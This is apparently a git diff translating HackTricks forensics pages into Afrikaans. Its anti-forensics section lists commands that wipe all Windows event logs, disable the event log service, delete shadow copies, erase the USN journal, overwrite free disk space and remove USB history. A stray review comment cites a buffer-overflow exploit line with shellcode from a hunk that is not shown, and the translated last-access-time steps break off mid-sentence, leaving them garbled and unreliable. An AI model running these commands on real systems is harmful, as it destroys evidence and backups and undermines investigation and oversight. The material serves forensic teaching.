-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
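Review bot: Same indentation defect as the earlier template: the `try:`/`except:` bodies are de-indented (`-    s.connect((ip, port))` becomes `+s.connect((ip, port))`), so the final exploit script in this hunk no longer parses. Restore the indentation; the `buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode` line and the `{% hint %}` translation are otherwise fine.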
diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md index 5b1e70c22..a87fc8018 100644 --- a/forensics/basic-forensic-methodology/README.md +++ b/forensics/basic-forensic-methodology/README.md @@ -1,40 +1,40 @@ -# Basic Forensic Methodology +# Basiese Forensiese Metodologie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Creating and Mounting an Image +## Skep en Monteer 'n Beeld {% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md" %} [image-acquisition-and-mount.md](../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md) {% endcontent-ref %} -## Malware Analysis +## Malware-analise -This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: +Dit is **nie noodwendig die eerste stap om uit te voer nadat jy die beeld het nie**. Maar jy kan hierdie malware-analise tegnieke onafhanklik gebruik as jy 'n lêer, 'n lêerstelselbeeld, geheuebeeld, pcap... het, so dit is goed om **hierdie aksies in gedagte te hou**: {% content-ref url="malware-analysis.md" %} [malware-analysis.md](malware-analysis.md) {% endcontent-ref %} -## Inspecting an Image +## Inspekteer 'n Beeld -if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in: +As jy 'n **forensiese beeld** van 'n toestel gekry het, kan jy begin **analiseer die partisies, lêerstelsel** wat gebruik word en **herwin** potensieel **interessante lêers** (selfs uitgewisde lêers). Leer hoe om dit te doen: {% content-ref url="partitions-file-systems-carving/" %} [partitions-file-systems-carving](partitions-file-systems-carving/) {% endcontent-ref %} -Depending on the used OSs and even platform different interesting artifacts should be searched: +Afhanklik van die gebruikte bedryfstelsels en selfs platforms moet verskillende interessante artefakte gesoek word: {% content-ref url="windows-forensics/" %} [windows-forensics](windows-forensics/) 
@@ -48,42 +48,42 @@ Depending on the used OSs and even platform different interesting artifacts shou [docker-forensics.md](docker-forensics.md) {% endcontent-ref %} -## Deep inspection of specific file-types and Software +## Diep inspeksie van spesifieke lêertipes en sagteware -If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\ -Read the following page to learn some interesting tricks: +As jy 'n baie **verdagte lêer** het, dan kan verskeie **truuks** nuttig wees, afhangende van die lêertipe en sagteware wat dit geskep het.\ +Lees die volgende bladsy om 'n paar interessante truuks te leer: {% content-ref url="specific-software-file-type-tricks/" %} [specific-software-file-type-tricks](specific-software-file-type-tricks/) {% endcontent-ref %} -I want to do a special mention to the page: +Ek wil 'n spesiale vermelding maak van die bladsy: {% content-ref url="specific-software-file-type-tricks/browser-artifacts.md" %} [browser-artifacts.md](specific-software-file-type-tricks/browser-artifacts.md) {% endcontent-ref %} -## Memory Dump Inspection +## Geheue-uitstorting-inspeksie {% content-ref url="memory-dump-analysis/" %} [memory-dump-analysis](memory-dump-analysis/) {% endcontent-ref %} -## Pcap Inspection +## Pcap-inspeksie {% content-ref url="pcap-inspection/" %} [pcap-inspection](pcap-inspection/) {% endcontent-ref %} -## **Anti-Forensic Techniques** +## **Anti-Forensiese Tegnieke** -Keep in mind the possible use of anti-forensic techniques: +Hou moontlike gebruik van anti-forensiese tegnieke in gedagte: {% content-ref url="anti-forensic-techniques.md" %} [anti-forensic-techniques.md](anti-forensic-techniques.md) {% endcontent-ref %} -## Threat Hunting +## Bedreigingsjag {% content-ref url="file-integrity-monitoring.md" %} [file-integrity-monitoring.md](file-integrity-monitoring.md) @@ -91,12 +91,12 @@ Keep in mind the possible use of anti-forensic techniques:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 91f89eb8e..064297eb3 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,181 +1,173 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Timestamps +# Tydstempels -An attacker may be interested in **changing the timestamps of files** to avoid being detected.\ -It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`. +'n Aanvaller mag belangstel om die tydstempels van lêers te **verander** om opsporing te vermy.\ +Dit is moontlik om die tydstempels binne die MFT in eienskappe `$STANDARD_INFORMATION` __ en __ `$FILE_NAME` te vind. -Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB). +Beide eienskappe het 4 tydstempels: **Wysiging**, **toegang**, **skepping**, en **MFT-registervoortgangswysiging** (MACE of MACB). -**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**. +**Windows verkenner** en ander gereedskap wys die inligting vanaf **`$STANDARD_INFORMATION`**. -## TimeStomp - Anti-forensic Tool +## TimeStomp - Anti-forensiese Gereedskap -This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**. +Hierdie gereedskap **verander** die tydstempelinligting binne **`$STANDARD_INFORMATION`** **maar nie** die inligting binne **`$FILE_NAME`** nie. Daarom is dit moontlik om **verdagte aktiwiteit te identifiseer**. ## Usnjrnl -The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes. +Die **USN Joernaal** (Update Sequence Number Journal) is 'n kenmerk van die NTFS (Windows NT-lêersisteem) wat volume-veranderinge byhou. Die [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) gereedskap maak dit moontlik om hierdie veranderinge te ondersoek. 
![](<../../.gitbook/assets/image (449).png>) -The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file. +Die vorige prentjie is die **uitset** wat deur die **gereedskap** gewys word waar dit waargeneem kan word dat sommige **veranderinge aan die lêer uitgevoer is**. ## $LogFile -**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes. +**Alle metadata-veranderinge aan 'n lêersisteem word gelog** in 'n proses wat bekend staan as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Die gelogde metadata word in 'n lêer genaamd `**$LogFile**` gehou, wat in die hoofgids van 'n NTFS-lêersisteem geleë is. Gereedskap soos [LogFileParser](https://github.com/jschicht/LogFileParser) kan gebruik word om hierdie lêer te ontled en veranderinge te identifiseer. ![](<../../.gitbook/assets/image (450).png>) -Again, in the output of the tool it's possible to see that **some changes were performed**. +Weereens, in die uitset van die gereedskap is dit moontlik om te sien dat **sommige veranderinge uitgevoer is**. 
-Using the same tool it's possible to identify to **which time the timestamps were modified**: +Met dieselfde gereedskap is dit moontlik om te identifiseer **watter tyd die tydstempels verander is**: ![](<../../.gitbook/assets/image (451).png>) -* CTIME: File's creation time -* ATIME: File's modification time -* MTIME: File's MFT registry modification -* RTIME: File's access time +* CTIME: Lêer se skeppingstyd +* ATIME: Lêer se wysigingstyd +* MTIME: Lêer se MFT-registervoortgangswysiging +* RTIME: Lêer se toegangstyd -## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison +## Vergelyking van `$STANDARD_INFORMATION` en `$FILE_NAME` -Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**. +'n Ander manier om verdagte gewysigde lêers te identifiseer, sou wees om die tyd in beide eienskappe te vergelyk en te soek na **verskille**. -## Nanoseconds +## Nanosekondes -**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**. +**NTFS**-tydstempels het 'n **presisie** van **100 nanosekondes**. Om dan lêers met tydstempels soos 2010-10-10 10:10:**00.000:0000 te vind, is baie verdag**. -## SetMace - Anti-forensic Tool +## SetMace - Anti-forensiese Gereedskap -This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information. +Hierdie gereedskap kan beide eienskappe `$STARNDAR_INFORMATION` en `$FILE_NAME` verander. Vanaf Windows Vista is dit egter nodig vir 'n lewendige bedryfstelsel om hierdie inligting te verander. -# Data Hiding +# Data Versteek -NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**. 
+NFTS gebruik 'n groep en die minimum inligtingsgrootte. Dit beteken dat as 'n lêer 'n groep en 'n half gebruik, sal die **oorskietende helfte nooit gebruik word nie** totdat die lêer uitgevee word. Dit is dan moontlik om data in hierdie "verborge" spasie te **versteek**. -There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added: +Daar is gereedskap soos slacker wat dit moontlik maak om data in hierdie "verborge" spasie te versteek. 'n Ontleding van die `$logfile` en `$usnjrnl` kan egter wys dat daar data bygevoeg is: ![](<../../.gitbook/assets/image (452).png>) -Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted. +Dit is dan moontlik om die spasie te herwin deur gereedskap soos FTK Imager te gebruik. Let daarop dat hierdie soort gereedskap die inhoud geobskureer of selfs versleutel kan stoor. # UsbKill -This is a tool that will **turn off the computer if any change in the USB** ports is detected.\ -A way to discover this would be to inspect the running processes and **review each python script running**. +Dit is 'n gereedskap wat die rekenaar sal **afskakel as enige verandering in die USB-poorte** opgespoor word.\ +'n Manier om dit te ontdek sou wees om die lopende prosesse te ondersoek en **elke python-skripsie wat loop te hersien**. -# Live Linux Distributions +# Lewende Linux-verspreidings -These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion. +Hierdie verspreidings word **uitgevoer binne die RAM-geheue**. Die enigste manier om hulle op te spoor is **as die NTFS-lêersisteem met skryfregte aangeheg is**. 
As dit net met leesregte aangeheg is, sal dit nie moontlik wees om die indringing op te spoor nie. -# Secure Deletion +# Veilige Skrapping [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) -# Windows Configuration +# Windows-konfigurasie -It's possible to disable several windows logging methods to make the forensics investigation much harder. +Dit is moontlik om verskeie Windows-loggingsmetodes uit te skakel om die forensiese ondersoek baie moeiliker te maak. -## Disable Timestamps - UserAssist +## Skakel Tydstempels Af - UserAssist -This is a registry key that maintains dates and hours when each executable was run by the user. +Dit is 'n registerleutel wat datums en ure behou wanneer elke uitvoerbare lêer deur die gebruiker uitgevoer is. -Disabling UserAssist requires two steps: +Om UserAssist uit te skakel, is twee stappe nodig: -1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled. -2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. +1. Stel twee registerleutels, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` en `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, beide op nul om aan te dui dat ons UserAssist wil uitskakel. +2. Wis jou register-subbome wat lyk soos `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`. -## Disable Timestamps - Prefetch +## Skakel Tydstempels Af - Prefetch -This will save information about the applications executed with the goal of improving the performance of the Windows system. 
However, this can also be useful for forensics practices. +Dit sal inligting oor die uitgevoerde toepassings stoor met die doel om die prestasie van die Windows-stelsel te verbeter. Dit kan egter ook nuttig wees vir forensiese praktyke. -* Execute `regedit` -* Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` -* Right-click on both `EnablePrefetcher` and `EnableSuperfetch` -* Select Modify on each of these to change the value from 1 (or 3) to 0 -* Restart +* Voer `regedit` uit +* Kies die lêerpad `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` +* Regskliek op beide `EnablePrefetcher` en `EnableSuperfetch` +* Kies Wysig op elkeen van hierdie om die waarde van 1 (of 3) na 0 te verander +* Herlaai -## Disable Timestamps - Last Access Time +## Skakel Tydstempels Af - Laaste Toegangstyd -Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance. +Telkens wanneer 'n gids vanaf 'n NTFS-volume op 'n Windows NT-bediener geopen word, neem die stelsel die tyd om 'n tydstempelveld op elke gelysde gids op te dateer, genaamd die laaste toegangstyd. Op 'n baie gebruikte NTFS-volume kan dit die prestasie beïnvloed. -1. Open the Registry Editor (Regedit.exe). -2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. -3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process. -4. Close the Registry Editor, and reboot the server. +1. 
Maak die Registerredigeerder (Regedit +## Verwyder USB Geskiedenis -## Delete USB History +Al die **USB-toestelinskrywings** word gestoor in die Windows-registreerder onder die **USBSTOR**-registreersleutel wat sub-sleutels bevat wat geskep word wanneer jy 'n USB-toestel in jou rekenaar of draagbare rekenaar steek. Jy kan hierdie sleutel vind by H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deur dit te verwyder**, sal jy die USB-geskiedenis verwyder.\ +Jy kan ook die hulpmiddel [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) gebruik om seker te maak dat jy hulle verwyder het (en om hulle te verwyder). -All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\ -You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them). +'n Ander lêer wat inligting oor die USB's stoor, is die lêer `setupapi.dev.log` binne `C:\Windows\INF`. Dit moet ook verwyder word. -Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted. 
+## Deaktiveer Skaduwee Kopieë -## Disable Shadow Copies +**Lys** skaduwee kopieë met `vssadmin list shadowstorage`\ +**Verwyder** hulle deur `vssadmin delete shadow` uit te voer -**List** shadow copies with `vssadmin list shadowstorage`\ -**Delete** them running `vssadmin delete shadow` +Jy kan hulle ook via die GUI verwyder deur die stappe te volg wat voorgestel word in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) -You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) +Om skaduwee kopieë te deaktiveer [stappe vanaf hier](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): -To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): +1. Maak die Dienste-program oop deur "dienste" in die tekssoekkasie in te tik nadat jy op die Windows-beginknoppie geklik het. +2. Vind "Volume Shadow Copy" in die lys, kies dit, en kry toegang tot Eienskappe deur regs te klik. +3. Kies "Gedeaktiveer" uit die "Beginsoort" keuselys, en bevestig dan die verandering deur op Toepas en OK te klik. -1. Open the Services program by typing "services" into the text search box after clicking the Windows start button. -2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking. -3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK. 
+Dit is ook moontlik om die konfigurasie te wysig van watter lêers in die skaduwee kopie gekopieer gaan word in die register `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` -It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` +## Oorskryf verwyderde lêers -## Overwrite deleted files +* Jy kan 'n **Windows-hulpmiddel** gebruik: `cipher /w:C` Dit sal cipher aandui om enige data van die beskikbare ongebruikte skyfspasie binne die C-aandryf te verwyder. +* Jy kan ook hulpmiddels soos [**Eraser**](https://eraser.heidi.ie) gebruik -* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive. -* You can also use tools like [**Eraser**](https://eraser.heidi.ie) +## Verwyder Windows-gebeurtenislogboeke -## Delete Windows event logs - -* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log" +* Windows + R --> eventvwr.msc --> Brei "Windows-logboeke" uit --> Regskliek op elke kategorie en kies "Logboek skoonmaak" * `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` * `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` -## Disable Windows event logs +## Deaktiveer Windows-gebeurtenislogboeke * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -* Inside the services section disable the service "Windows Event Log" -* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` +* Deaktiveer die diens "Windows Event Log" binne die dienste-afdeling +* `WEvtUtil.exec clear-log` of `WEvtUtil.exe cl` -## Disable $UsnJrnl +## Deaktiveer $UsnJrnl * `fsutil usn deletejournal /d c:`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md index 568cc58ca..5a8c551c3 100644 --- a/forensics/basic-forensic-methodology/docker-forensics.md +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -1,31 +1,28 @@ -# Docker Forensics +# Docker Forensika
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
